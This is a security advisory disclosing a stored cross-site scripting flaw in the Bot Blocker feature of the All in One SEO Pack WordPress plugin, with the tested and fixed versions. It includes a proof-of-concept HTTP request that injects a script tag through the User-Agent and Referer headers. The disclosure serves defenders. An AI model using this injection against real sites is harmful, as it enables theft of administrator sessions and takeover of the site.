WordPress All in One SEO Pack Plugin Persistent Cross-Site Scripting
Posted on 30 November -0001
<HTML><HEAD><TITLE>WordPress All in One SEO Pack Plugin Persistent Cross-Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>------------------------------------------------------------------------ Persistent Cross-Site Scripting in All in One SEO Pack WordPress Plugin ------------------------------------------------------------------------ David Vaartjes, July 2016 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A stored Cross-Site Scripting vulnerability was found in the Bot Blocker functionality of the All in One SEO Pack WordPress Plugin (1+ million active installs). This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully tested on the All in One SEO Pack WordPress Plugin version 2.3.6.1. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ This issue has been fixed in version 2.3.7 of the plugin. Free version https://wordpress.org/plugins/all-in-one-seo-pack/ Pro version https://semperplugins.com/all-in-one-seo-pack-pro-version/ ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html PoC: ------------------------------------------------------------------------ GET / HTTP/1.1 Host: 172.16.232.130 User-Agent: Abonti </pre><script>alert(1);</script> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://172.16.232.130/</pre><script>alert(1);</script> Connection: close Cache-Control: max-age=0 ------------------------------------------------------------------------ </BODY></HTML>
